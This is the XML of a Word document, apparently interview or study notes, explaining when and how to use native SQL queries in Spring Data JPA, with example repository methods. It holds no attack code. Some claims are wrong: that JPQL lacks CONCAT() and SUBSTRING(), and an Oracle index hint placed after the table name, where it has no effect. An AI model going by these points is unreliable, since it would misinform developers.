          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SQL queries</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that are written in the native syntax of the underlying database, instead of using JPQL (Java Persistence Query Language) or HQL (Hibernate Query Language). Native queries are directly executed by the database engine, making them useful when you need to use database-specific features that are not available in JPQL or HQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D75EC9B" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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Key Points about Native Queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7002C5CE" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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atabase-Specific</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Native queries are written using the SQL syntax of the database you're using (e.g., MySQL, PostgreSQL, Oracle).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356B6553" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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e Cases</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741AF3CC" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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hen you need to use SQL features that are not supported by JPQL (e.g., complex joins, stored procedures, custom SQL functions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4907C05C" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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To optimize performance for complex queries or to use specific database optimizations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496B6EF3" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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Limitations</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398C3ED6" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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y are not portable across different databases, as they depend on the specific SQL dialect of the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54537A6C" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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y do not support entity mappings or query caching provided by JPA, so you must handle mapping results manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218C638B" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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How to Use Native Queries in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D38AF6" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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Spring Data JPA, you can use native queries by annotating a repository method with @Query and setting the nativeQuery attribute to true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B86D370" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6A41E3" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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interface EmployeeRepository extends JpaRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6E5EE9" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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2E3BC206" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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Native SQL query to find employee by ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458F2E8E" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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Query(value = "SELECT * FROM employees WHERE employee_id = ?1", nativeQuery = true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F9D747" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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mployee findEmployeeById(Long id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC48288" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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2CD056AD" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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the example above:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F99F853" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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Query annotation is used to write a native SQL query to fetch an employee by their ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D85AF2" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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nativeQuery = true attribute indicates that it's a native SQL query, not JPQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6725EB1A" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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Native Query for Stored Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B92195" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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also use native queries to call stored procedures in your database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4A2280" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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interface EmployeeRepository extends JpaRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601A6C61" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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70BCA3F2" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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ocedure(name = "find_employee_by_id")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEA6B89" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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mployee findEmployeeById(Long id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2C1A8C" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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A03340A" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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this case, @Procedure can be used to call a stored procedure defined in your database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F052E6" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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Advantages of Native Queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A937A4" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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Flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can write complex queries that aren't possible with JPQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC8729B" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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atabase-specific optimizations</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can leverage specific database features for performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E190F4" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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Full control over SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Direct access to SQL allows for full control over the query execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F82C904" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37667944" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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ortability</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The queries are tied to a specific database, reducing portability across different database systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7147053C" w14:textId="77777777" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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Maintainability</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Native queries can be harder to maintain, especially if the underlying database changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3D9B05" w14:textId="2A874044"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AFB01F8">
          <v:rect id="_x0000_i2657" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="162DC4BD" w14:textId="12A13634" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="631" w:name="_Toc196308111"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Where do you use native queries</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="631"/>
    </w:p>
    <w:p w14:paraId="333D5EBD" w14:textId="74280373" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84"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Native queries are typically used in the following scenarios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54685892" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A8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Complex SQL Queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421AB6B3"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cenario</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When the requirements go beyond what JPQL or HQL can handle, such as complex joins, unions, subqueries, or database-specific SQL functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DFCCD1"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r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C134F5" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84"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Fetching data from multiple tables that is difficult or inefficient to express in JPQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20197C57" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84"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mplex aggregate queries that require specific database SQL functions like GROUP BY or HAVING.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC3C736"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Query(value = "SELECT e.name, e.salary FROM Employee e JOIN Department d ON e.department_id = d.id WHERE d.name = ?1", nativeQuery = true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBE1F89"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ist&lt;Object[]&gt; findEmployeesByDepartment(String departmentName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CC9819" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A8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Using Database-Specific Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F3BBF0"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cenario</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you need to use database-specific SQL features like full-text search, window functions, or other advanced SQL operations not supported by JPQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517DE39E"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r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659200EF" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84"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ing a database’s native text search or functions that JPQL does not support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3AB72E" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84"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riting SQL queries optimized for specific databases, such as ROW_NUMBER() or RANK() in PostgreSQL or MySQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409217D5"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Query(value = "SELECT * FROM products WHERE MATCH(name) AGAINST (?1 IN NATURAL LANGUAGE MODE)", nativeQuery = true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA92217"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ist&lt;Product&gt; searchProductsByName(String searchTerm);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568DB2C8" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A8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Performance Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1510881D"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lastRenderedPageBreak/>
        <w:t>Scenario</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If JPQL or HQL does not generate the most optimized SQL for your database, you can write a native SQL query that performs better. This can be especially useful for large datasets or when you need very efficient data retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364271C4"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r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E132CA5" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84"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ing LIMIT and OFFSET for pagination in databases like MySQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A47183" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84"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ing database-specific indexing features or hints that JPQL can't optimize.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA37194"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Query(value = "SELECT * FROM orders WHERE order_date &gt; ?1 LIMIT 10", nativeQuery = true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C48FD14"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ist&lt;Order&gt; findRecentOrders(Date date);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0721B898" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A8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4. Stored Procedures and Functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B347E8"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cenario</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you want to call a stored procedure or user-defined function (UDF) that is already implemented in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDA5AF5"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r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E05460" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84"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alling a stored procedure for complex business logic that is implemented in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1711CBF5" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84"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ecuting batch operations directly within the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CA2AD5"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Query(value = "CALL GetEmployeeDetails(:empId)", nativeQuery = true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D9E308"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ist&lt;Employee&gt; getEmployeeDetailsById(@Param("empId") Long empId);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE75F7A" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A8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5. Migration from SQL-based Legacy Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A46C6A8"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cenario</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When migrating from legacy systems that already use SQL heavily and there’s a need to continue leveraging SQL for certain parts of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283FCDE9"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r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CB23EF" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84"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 legacy system may have SQL reports or queries that need to be integrated into a new Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362E5BD2"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Query(value = "SELECT * FROM employees WHERE employee_code = ?1", nativeQuery = true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B855285"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mployee findEmployeeByCode(String employeeCode);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BB79E1" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A8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6. When JPQL or HQL Is Not Supported</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173F841C"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cenario</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: JPQL and HQL have limitations, such as not supporting certain SQL features, like SELECT * queries or certain database-specific SQL syntax. In such cases, native SQL queries are used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABBD1B4"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r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1268D4B0" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84"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JPQL doesn’t support direct SQL functions like CONCAT(), SUBSTRING(), or complex joins with custom filtering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB425CC" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A8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7. Bulk Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1AF659"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cenario</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you need to execute bulk updates or deletes efficiently, native SQL can be used to avoid the overhead of entity management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41699C1C"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r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B96A79B" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84"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Deleting records in bulk without loading entities into memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA89916"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Modifying</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3805A82D"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Query(value = "DELETE FROM employee WHERE last_login &lt; ?1", nativeQuery = true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C118F41"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void deleteInactiveEmployees(Date lastLogin);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B18056" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A8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8. Database-Specific Query Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C954746"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cenario</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you know the underlying database has specific optimizations or hints that can be leveraged for improved performance, native queries allow you to include those optimizations directly in the query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DC0EB6"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r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162D447F" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84"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ing Oracle-specific optimizations or hints, such as /*+ INDEX(table_name index_name) */, to force the query to use a specific index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A970A9"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Query(value = "SELECT * FROM orders /*+ INDEX(orders idx_order_date) */ WHERE order_date &gt; ?1", nativeQuery = true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C53E9E6"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ist&lt;Order&gt; findOrdersByDate(Date date);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A40E29C" w14:textId="77777777" w:rsidR="00BA6A8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F3B5674">
          <v:rect id="_x0000_i2658" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26427482" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A8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When to Avoid Native Queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7C6030"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ortability</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Native queries are specific to the database, so they will not work if the database is changed. This reduces the portability of the application across different databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6482FDC8"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Maintainability</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Writing SQL by hand increases the risk of SQL injection or errors and may make code harder to maintain, especially for simple CRUD operations that can be easily handled with JPQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104ED486"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ntity Mapping</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Native queries don’t benefit from automatic entity mapping by JPA, which means you have to map query results manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E38C00F" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02B1AE13" w14:textId="213BCD1E"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general, native queries should be used sparingly and only when you require database-specific functionality or optimizations that cannot be achieved with JPQL/HQL.</w:t>
      </w:r>
    </w:p>
